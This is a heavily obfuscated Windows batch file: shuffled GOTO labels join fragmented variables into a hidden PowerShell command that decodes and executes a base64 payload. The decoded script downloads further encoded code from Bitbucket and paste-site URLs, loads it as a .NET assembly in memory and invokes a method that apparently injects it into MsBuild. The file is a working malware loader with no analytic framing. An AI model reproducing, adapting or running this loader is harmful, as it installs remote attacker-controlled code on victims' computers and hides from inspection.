@echo off
GOTO GGJNOFHDJD
:OIOOGOGGOO
SET FNJDGODJND=CgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAdQAgAGkAbgAgACQAcgBhAG4AZ
GOTO FHGSINDGFO2
:GDGUNNIOJJ
SET IJGONKGUGU=QAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJABjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1
GOTO FHGSINDGFO4
:IJISDHNSDG
SET FKIJDJOGFJ=BQAG8AcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAFAAbwBzACAALQBnAHQAIAAkAHMAdABhAHIAdABQAG8Ac
GOTO GJIGOFGJJN
:DONOGNDIHI
SET GOSIONKJGO=LAAgACQAaQBuAGoAVgBhAGwAdQBlACwAIAAnADAAJwAsACAAJw
GOTO OIGDOSGJUG
:DGFJNNODDN
SET OGJGOOOUJO=BUAHkAcABlACgAJwBtAHkAcAByAG8AZwByAGEAbQAuAEgAbwBtAGUAZQBzAC
GOTO DNGFGJGODI9
:NONDFFJGIG
SET IGFFGFIJGO=dABUAHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAG0ALgBHAGUAdA
GOTO DGFJNNODDN
:DGIOGDFJDJ
SET GOIODDSGDD=ByAGwAcwApAAoAIAAgACAAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABT
GOTO DSGKFFNNFJ
:DFONOFHNFN
SET GGHFGFGNGO=.encoding]::Unicode.GetString^([system.convert]::From
GOTO FKUNIFNSDH4
:JGIOODUJGN
SET JSGGDIGKGF=CAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQAQwBoAHUAbgBrACAAPQAgACQAdABlAHgAdA
GOTO IKKIIOGJNN9
:DOGDINONGK
SET GGFNIDFDUF=AGEAbAB1AGUAIAA9ACAAJwBNAHMAQgB1AGkAbABkACcACgAgACAAIAAgACAAIAAgACAAJABzAHQAcgAgAD0AIAAn
GOTO SOOIDGFJFG
:ODDDGOOGDH
SET IGODDDOIGS=CgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAJAB0AGEAcgBnAGUAdABUAHkAcABlAC4ARw
GOTO OOSNJIDGOO
:IGNFJOFOGK
SET FNDIKJOGII=AH0ACgAgACAAIAAgAH0ACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAHUAbAB
GOTO FHGSINDGFO6
:DNGFGJGODI
SET DHFIFKJHJG=B5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABl
GOTO SJIHFUFDID
:GJIGOFGJJN
SET NDHIDNFGGI=wApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHMAdABhAHIAdABQAG8AcwAgACsAPQA
GOTO IKKIIOGJNN6
:JDONNIKONO
SET NGINOGUFID=AkAHQAZQB4AHQAQwBvAG4AdABlAG4AdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIA
GOTO NSFDJHFODO
:FHGSINDGFO
SET FDGGSFHOJF=-Command "Start-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\power
GOTO NGIFODNNID
:DNGFGJGODI0
SET FGIGODKGFF=BQAG8AcwAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAp
GOTO DNGFGJGODI1
:GJKFGNNGGS
SET NGNKSOGGGF=AGUAcwBhAC8AbQBvAGMALgB0AG4AZQB0AG4AbwBjAHIAZQBzAHU
GOTO NIGGNKNFGN
:DIJODGJODI
SET IONGJDIOSS=kAHQAYQByAGcAZQB0AFUAcgBsAHMACgBpAGYAIAAoACQAcgBhAHcARABhAHQAYQAgAC0
GOTO NGIFODNNID5
:GJDDOKNFFG
SET IFOGFUNDIN=ABsAGUAcwBzACcAKQAKACkACgAKACQAcgBhAHcARABhAHQAYQAgAD0AIABHAGUAdAAtAFIAZQBtAG8AdABlAEQAYQB0AGEAIAA
GOTO DIJODGJODI
:GOFKSOODSK
SET NJUOJGJHDD=BpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AEQAYQB0AGEAKQAKACAAIAAgACAAJABzA
GOTO NGIFODNNID8
:DNGFGJGODI2
SET ONOFIGFGGG=gBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQB
GOTO DNGFGJGODI3
:GSGIFGDIJD
SET IIGUUIGGDJ=0AIAAnADwAPABFAE4ARAA+AD4AJwAKAAoAIAAgACAAIAAkAHMAdABhAHIAdABQAG8AcwAgAD0AIA
GOTO JDONNIKONO
:DSGKFFNNFJ
SET GHDDKOODDS=AHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQACgAgACAAIAAgACQAcgBhAG4AZABvAG
GOTO OIDFDODUNJ
:NDGJOFGKID
SET NNSNFUIGFD=AHYAbwBrAGUAKAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAb
GOTO SJIHFUFDID9
:NSNHFGGGOI
SET OUGNGGFNDI=BvAGEAZABzAC8AMgAuAGoAcABnACcAKQAsAAoAIAAgACAAIAAoACQAYgBhAH
GOTO NGIFODNNID2
:DNGFGJGODI5
SET GDIJHNDNOH=QBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYQBzAHMAZQ
GOTO DNGFGJGODI6
:NGIFODNNID
SET NJOGSNNDNI=shell.exe -WindowStyle Hidden -ArgumentList '-Command \"$jfsjg = ''WwBOAGUAdA
GOTO IKKIIOGJNN
:NSFDJHFODO
SET HGIOOUINSJ=dABUAGEAZwApAAoAIAAgACAAIAAkAGUAbgBkAFAAbwBzACAAIAAgAD0AIAAkAHQAZQB4AHQ
GOTO IKKIIOGJNN2
:OIGDOSGJUG
SET GNDGSOGDOO=B4ADgANgAnACkACgAgACAAIAAgACAAIAAgACAAKQAKACAAIAAgACAAf@QAKAH0A'';$oWgjffuxd = [system.Text
GOTO DFONOFHNFN
:SODOFGDJDO
%GHINDDHFJJ%%FDGGSFHOJF%%NJOGSNNDNI%%DFDJNDOIGI%%DHFIFKJHJG%%FJJJJFNDOI%%GOJFDKFNDO%%GOIODDSGDD%%GHDDKOODDS%%GSJGJGUJJJ%%UDIGDIGDNI%%FNJDGODJND%%OSJOGGKGOD%%IJGONKGUGU%%GHDNIGGDGS%%FNDIKJOGII%%DNOJUUNUSU%%DNSFDFNDSG%%GDFGHIHGNF%%NIDDKDIFSN%%FJDIODFDFF%%OUGNGGFNDI%%ONFKNGSJGS%%IFOGFUNDIN%%IONGJDIOSS%%IOFONKDOGN%%DOHJJKDKDO%%NJUOJGJHDD%%GFSGKUDOUG%%IIGUUIGGDJ%%NGINOGUFID%%HGIOOUINSJ%%DINGFGNKOJ%%UDIODGGDOO%%FKIJDJOGFJ%%NDHIDNFGGI%%FFNIDDUGGF%%OFGGIINFUD%%JSGGDIGKGF%%IGUJSDGGDD%%FGIGODKGFF%%SDODGJUUDG%%ONOFIGFGGG%%JJDDONDNUF%%IKSONDDDII%%GDIJHNDNOH%%NOGOGDHIGD%%IGFFGFIJGO%%OGJGOOOUJO%%FHOIDHOFGH%%GGFNIDFDUF%%GGNIDIOHIS%%NOSNNGNGOD%%NGNKSOGGGF%%NOJOIGGJJI%%GNDSHUIGGS%%IGODDDOIGS%%FGNOGSGDGO%%NNSNFUIGFD%%ONOGDIGGFN%%OJGFDOFDGO%%GOSIONKJGO%%GNDGSOGDOO%%GGHFGFGNGO%%GDGOFGOJOO%%GOJNGNGGGO%
GOTO FKUNIFNSDH7
:JSDDIKSFJN
SET NOSNNGNGOD=vAG4AaQBhAG0ALwBzAGQAYQBlAGgALwBzAGYAZQByAC8AcwBsAG8AaAAvAG8AZABhAHUAcgBn
GOTO GJKFGNNGGS
:FKUNIFNSDH
SET GOJFDKFNDO=BEAGEAdABhACAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAdQ
GOTO DGIOGDFJDJ
:IKKIIOGJNN
SET DFDJNDOIGI=AuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdA
GOTO DNGFGJGODI
:NGIFODNNID8
SET GFSGKUDOUG=HQAYQByAHQAVABhAGcAIAA9ACAAJwA8ADwAUwBUAEEAUgBUAD4APgAnAAoAIAAgACAAIAAkAGUAbgBkAFQAYQBnACAAIAAgAD
GOTO GSGIFGDIJD
:FKUNIFNSDH4
SET GDGOFGOJOO=base64string^( [regex]::replace^($jfsjg, ''f@'',''f''^)^)^);iex $oW
GOTO FKUNIFNSDH5
:FHGSINDGFO2
SET OSJOGGKGOD=ABvAG0ATwByAGQAZQByACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAH
GOTO GDGUNNIOJJ
:GUGDFJKJNO
SET GNDSHUIGGS=FMAdQBiAHMAdAByAGkAbgBnACgAMAAsACAAJABnAGcALgBMAGUAbgBnAHQAaAAgAC0AIAA3ACkA
GOTO ODDDGOOGDH
:FHGSINDGFO6
SET DNOJUUNUSU=sAAoAf@QAKACQAcwBjAGgAZQBtAGUAMQAgAD0AIAAnAGgAdAB0AHAAJwAKACQAcwBjAGgAZQBtAGUAMgAgAD0AIAAnAHMAOg
GOTO FHGSINDGFO7
:DNGFGJGODI1
SET SDODGJUUDG=AAoACgAgACAAIAAgACAAIAAgACAAJABhAHMAcwBlAG0AYgBsAHkAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0AL
GOTO DNGFGJGODI2
:NIGGNKNFGN
SET NOJOIGGJJI=AYgB1AGgAdABpAGcALgB3AGEAcgAvAC8AOgBzACAAZwBzAGYAZgBzAGYAJwAgADsAIAAkAGcAZwAgAD0AIAAkAGcAZwAuA
GOTO GUGDFJKJNO
:SOOIDGFJFG
SET GGNIDIOHIS=ADAAJwAKACAAIAAgACAAIAAgACAAIAAkAGcAZwAgAD0AIAAnAHIAZQBuAGUAdABzAG8AcwA
GOTO JSDDIKSFJN
:IKKIIOGJNN7
SET OFGGIINFUD=HQAaAAgAD0AIAAkAGUAbgBkAFAAbwBzACAALQAgACQAcwB0AGEAcgB0AFAAbwBzAAoAIAAgA
GOTO JGIOODUJGN
:GGJNOFHDJD
SET GHINDDHFJJ=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe 
GOTO FHGSINDGFO
:IKKIIOGJNN3
SET UDIODGGDOO=gBkAFQAYQBnACkACgAKACAAIAAgACAAaQBmACAAKAAkAHMAdABhAHIAdA
GOTO IJISDHNSDG
:FKUNIFNSDH0
SET OJGFDOFDGO=AF0AXQAgACgAJABnAGcAIAAgACwAIAAkAHMAdAByACwAIAAnACcA
GOTO DONOGNDIHI
:NGIFODNNID2
SET ONFKNGSJGS=MAZQBVAHIAbAAgACsAIAAnAHAAYQBzAHQAZQAuAHMAZQBuAHMAaQBvAC4AbgBvAC8AUAByAGUAbQBpAGUAcgBHAHUAd
GOTO GJDDOKNFFG
:OOSNJIDGOO
SET FGNOGSGDGO=BlAHQATQBlAHQAaABvAGQAKAAnAHIAdQBuACcAIAArACAAJwBzAHMAJwApAC4ASQBu
GOTO NDGJOFGKID
:SJIHFUFDID
SET FJJJJFNDOI=AF0AOgA6AFQAbABzADEAMgAKAAoAZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBSAGUAbQBvAHQAZQ
GOTO FKUNIFNSDH
:FHGSINDGFO4
SET GHDNIGGDGS=ACkAIAB9ACAAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAg
GOTO IGNFJOFOGK
:SJIHFUFDID9
SET ONOGDIGGFN=gB1AGwAbAAsAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBvAGIAagBlAGMAdABb
GOTO FKUNIFNSDH0
:FHGSINDGFO0
SET UDIGDIGDNI=AGMAdAAgACQAdQByAGwAcwAgAC0AQwBvAHUAbgB0ACAAJAB1AHIAbABzAC4ATABlAG4AZwB0AGgA
GOTO OIOOGOGGOO
:FHGSINDGFO8
SET GDFGHIHGNF=ADEAIAArACAAJABzAGMAaABlAG0AZQAyAAoACgAkAHQAYQByAGc
GOTO FHGSINDGFO9
:FKUNIFNSDH5
SET GOJNGNGGGO=gjffuxd\"'"
GOTO SODOFGDJDO
:DNGFGJGODI9
SET FHOIDHOFGH=cAKQAKACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAJABpAG4AagBW
GOTO DOGDINONGK
:NGIFODNNID5
SET IOFONKDOGN=AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAHQAZQB4AHQAQwBvAG4AdABlAG4
GOTO NGIFODNNID6
:IKKIIOGJNN6
SET FFNIDDUGGF=gACQAcwB0AGEAcgB0AFQAYQBnAC4ATABlAG4AZwB0AGgACgAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADYANABMAGUAbgBnA
GOTO IKKIIOGJNN7
:FKUNIFNSDH7

GOTO FKUNIFNSDH8
:DNGFGJGODI3
SET JJDDONDNUF=uAGcAKAAkAGIAYQBzAGUANgA0AEMAaAB1AG4AawApAAoAIAAgACAAIAAgACA
GOTO DNGFGJGODI4
:IKKIIOGJNN9
SET IGUJSDGGDD=BDAG8AbgB0AGUAbgB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdA
GOTO DNGFGJGODI0
:FHGSINDGFO9
SET NIDDKDIFSN=AZQB0AFUAcgBsAHMAIAA9ACAAQAAoAAoAIAAgACAAIAAoACQAYgBhAHMAZQBVAHIAbAAgACs
GOTO NGIFODNNID0
:NGIFODNNID6
SET DOHJJKDKDO=AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZA
GOTO GOFKSOODSK
:NGIFODNNID0
SET FJDIODFDFF=AIAAnAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBnAGgAawBqAGsAZwBoAGwAawBnAGwALwBnAGgAZgAvAGQAbwB3AG4AbA
GOTO NSNHFGGGOI
:FHGSINDGFO7
SET DNSFDFNDSG=AvAC8AJwAKACQAYgBhAHMAZQBVAHIAbAAgAD0AIAAkAHMAYwBoAGUAbQBl
GOTO FHGSINDGFO8
:DNGFGJGODI4
SET IKSONDDDII=AIAAgACQAbABvAGEAZABlAGQAQQBzAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZ
GOTO DNGFGJGODI5
:DNGFGJGODI6
SET NOGOGDHIGD=BtAGIAbAB5AEIAeQB0AGUAcwApAAoACgAgACAAIAAgACAAIAAgACAAJAB0AGEAcgBnAGUA
GOTO NONDFFJGIG
:OIDFDODUNJ
SET GSJGJGUJJJ=0ATwByAGQAZQByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBl
GOTO FHGSINDGFO0
:IKKIIOGJNN2
SET DINGFGNKOJ=AQwBvAG4AdABlAG4AdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAb
GOTO IKKIIOGJNN3
:FKUNIFNSDH8